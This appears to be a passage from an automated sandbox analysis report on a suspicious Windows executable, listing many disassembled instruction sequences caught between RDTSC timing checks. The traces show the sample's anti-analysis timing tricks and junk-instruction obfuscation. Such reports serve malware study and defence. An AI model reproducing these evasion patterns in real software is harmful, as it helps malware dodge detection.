0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50FB8 second address: 4D50FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50FBC second address: 4D50FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50FC2 second address: 4D50FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F73F910AA66h 0x0000000c sub ecx, 0760C6D8h 0x00000012 jmp 00007F73F910AA5Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D50FFC second address: 4D51017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51017 second address: 4D5104D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx], eax 0x0000000d jmp 00007F73F910AA67h 0x00000012 mov eax, dword ptr [esi+04h] 0x00000015 pushad 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 mov dword ptr [edx+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5104D second address: 4D5106C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 mov dx, C96Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5106C second address: 4D51110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c pushad 0x0000000d jmp 00007F73F910AA5Eh 0x00000012 pushfd 0x00000013 jmp 00007F73F910AA62h 0x00000018 xor cl, FFFFFFE8h 0x0000001b jmp 00007F73F910AA5Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+0Ch] 0x00000025 pushad 0x00000026 mov edx, eax 0x00000028 pushfd 0x00000029 jmp 00007F73F910AA60h 0x0000002e sbb si, B448h 0x00000033 jmp 00007F73F910AA5Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov dword ptr [edx+0Ch], eax 0x0000003d pushad 0x0000003e mov bx, ax 0x00000041 jmp 00007F73F910AA60h 0x00000046 popad 0x00000047 mov eax, dword ptr [esi+10h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F73F910AA5Dh 0x00000052 pop eax 0x00000053 movsx edx, si 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51110 second address: 4D5113E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73F90B68F0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5113E second address: 4D51144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51144 second address: 4D51172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73F90B68F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51172 second address: 4D511B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F73F910AA5Bh 0x0000000b adc ecx, 654C940Eh 0x00000011 jmp 00007F73F910AA69h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+14h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ax, di 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D511B0 second address: 4D51204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 pushfd 0x00000013 jmp 00007F73F90B68EEh 0x00000018 adc esi, 2619F4E8h 0x0000001e jmp 00007F73F90B68EBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [edx+18h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push edi 0x0000002c pop ecx 0x0000002d jmp 00007F73F90B68F7h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51204 second address: 4D5122C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73F910AA68h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5122C second address: 4D512C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F73F90B68F6h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F73F90B68EEh 0x0000001b and eax, 42AE5E68h 0x00000021 jmp 00007F73F90B68EBh 0x00000026 popfd 0x00000027 mov ah, BCh 0x00000029 popad 0x0000002a mov dword ptr [edx+20h], eax 0x0000002d jmp 00007F73F90B68EBh 0x00000032 mov eax, dword ptr [esi+24h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F73F90B68EBh 0x0000003d pushfd 0x0000003e jmp 00007F73F90B68F8h 0x00000043 adc cl, 00000028h 0x00000046 jmp 00007F73F90B68EBh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D512C4 second address: 4D512DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D512DC second address: 4D51327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F73F90B68EDh 0x00000012 sub cl, FFFFFFF6h 0x00000015 jmp 00007F73F90B68F1h 0x0000001a popfd 0x0000001b call 00007F73F90B68F0h 0x00000020 push esi 0x00000021 pop edx 0x00000022 pop esi 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+28h] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ecx, ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51327 second address: 4D513A9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F73F910AA61h 0x0000000c and ah, FFFFFFB6h 0x0000000f jmp 00007F73F910AA61h 0x00000014 popfd 0x00000015 popad 0x00000016 mov dword ptr [edx+28h], eax 0x00000019 pushad 0x0000001a movzx ecx, bx 0x0000001d mov dh, 40h 0x0000001f popad 0x00000020 mov ecx, dword ptr [esi+2Ch] 0x00000023 jmp 00007F73F910AA60h 0x00000028 mov dword ptr [edx+2Ch], ecx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F73F910AA5Eh 0x00000032 sub cx, CA38h 0x00000037 jmp 00007F73F910AA5Bh 0x0000003c popfd 0x0000003d mov cx, E86Fh 0x00000041 popad 0x00000042 mov ax, word ptr [esi+30h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov dl, 82h 0x0000004b mov ax, CB5Fh 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D513A9 second address: 4D513AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D513AE second address: 4D513D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F73F910AA61h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+30h], ax 0x00000011 pushad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D513D4 second address: 4D5140D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b pushad 0x0000000c call 00007F73F90B68F3h 0x00000011 mov dx, si 0x00000014 pop eax 0x00000015 mov edx, 2126C958h 0x0000001a popad 0x0000001b mov word ptr [edx+32h], ax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F73F90B68EAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5140D second address: 4D51413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51413 second address: 4D51417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0075 second address: 4DA007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA007B second address: 4DA007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA007F second address: 4DA0083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30D44 second address: 4D30D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30D4A second address: 4D30D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30D4E second address: 4D30D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F73F90B68F1h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov ecx, 4343D883h 0x00000018 jmp 00007F73F90B68F8h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30D9B second address: 4D30D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30D9F second address: 4D30DA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30DA5 second address: 4D30E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73F910AA62h 0x00000009 xor si, 7AA8h 0x0000000e jmp 00007F73F910AA5Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F73F910AA68h 0x0000001a or ecx, 5A7D6D08h 0x00000020 jmp 00007F73F910AA5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F73F910AA65h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30E12 second address: 4D30E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51539 second address: 4D5153F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5153F second address: 4D51590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F73F90B68F0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F73F90B68EEh 0x00000018 and esi, 0A396DE8h 0x0000001e jmp 00007F73F90B68EBh 0x00000023 popfd 0x00000024 mov ch, E1h 0x00000026 popad 0x00000027 push dword ptr [ebp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D51590 second address: 4D51596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D5161A second address: 4D51539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b jmp 00007F73F90B68F6h 0x00000010 retn 0008h 0x00000013 push 0042F258h 0x00000018 push edi 0x00000019 mov dword ptr [00434D64h], eax 0x0000001e call esi 0x00000020 mov edi, edi 0x00000022 jmp 00007F73F90B68F0h 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov bx, cx 0x0000002c mov eax, 08F4CF09h 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F73F90B68F1h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90239 second address: 4D90248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90248 second address: 4D90286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F73F90B68F5h 0x0000000b sbb ax, CE26h 0x00000010 jmp 00007F73F90B68F1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov dh, E9h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90286 second address: 4D9029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D9029C second address: 4D902A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D902A0 second address: 4D902A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D9016F second address: 4D901A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73F90B68F1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx eax, bx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D901A5 second address: 4D30D44 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F73F910AA5Fh 0x00000008 sub ch, FFFFFFCEh 0x0000000b jmp 00007F73F910AA69h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, 63D7h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007F73F910AA5Ah 0x0000001f pop ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F73F910AA5Dh 0x00000027 adc ax, 48B6h 0x0000002c jmp 00007F73F910AA61h 0x00000031 popfd 0x00000032 popad 0x00000033 jmp dword ptr [7629155Ch] 0x00000039 mov edi, edi 0x0000003b push ebp 0x0000003c mov ebp, esp 0x0000003e mov ecx, dword ptr fs:[00000018h] 0x00000045 mov eax, dword ptr [ebp+08h] 0x00000048 mov dword ptr [ecx+34h], 00000000h 0x0000004f cmp eax, 40h 0x00000052 jnc 00007F73F910AA5Dh 0x00000054 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000005b pop ebp 0x0000005c retn 0004h 0x0000005f test eax, eax 0x00000061 je 00007F73F910AA73h 0x00000063 mov eax, dword ptr [00432010h] 0x00000068 cmp eax, FFFFFFFFh 0x0000006b je 00007F73F910AA69h 0x0000006d mov esi, 0042F218h 0x00000072 push esi 0x00000073 call 00007F73FDA39E32h 0x00000078 mov edi, edi 0x0000007a jmp 00007F73F910AA60h 0x0000007f xchg eax, ebp 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 mov ax, di 0x00000086 movsx ebx, cx 0x00000089 popad 0x0000008a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D309E3 second address: 4D30A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F73F90B68EBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 mov ebx, eax 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F73F90B68F7h 0x0000001a sbb esi, 306AC4DEh 0x00000020 jmp 00007F73F90B68F9h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30A3D second address: 4D30A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30A50 second address: 4D30A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov di, 0E7Ch 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30A79 second address: 4D30A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30A7F second address: 4D30A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D30A83 second address: 4D30AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b jmp 00007F73F910AA68h 0x00000010 sub eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 mov dx, cx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90446 second address: 4D9044A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D9044A second address: 4D90450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90450 second address: 4D90456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90456 second address: 4D90475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F73F910AA5Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 movzx esi, di 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90475 second address: 4D9049A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 3B0E9590h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F73F90B68F0h 0x00000016 pop ecx 0x00000017 mov ecx, ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D9049A second address: 4D904A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D904A0 second address: 4D904A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90E3C second address: 4D90E6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e mov ah, 12h 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F73F910AA64h 0x0000001a mov bx, ax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90E6F second address: 4D90E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90E75 second address: 4D90E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90E79 second address: 4D90E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73F90B68F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90E9E second address: 4D90EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90EBB second address: 4D90ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F90B68ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90ECB second address: 4D90EF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73F910AA65h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90EF6 second address: 4D90F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90F12 second address: 4D90F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90F16 second address: 4D90F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
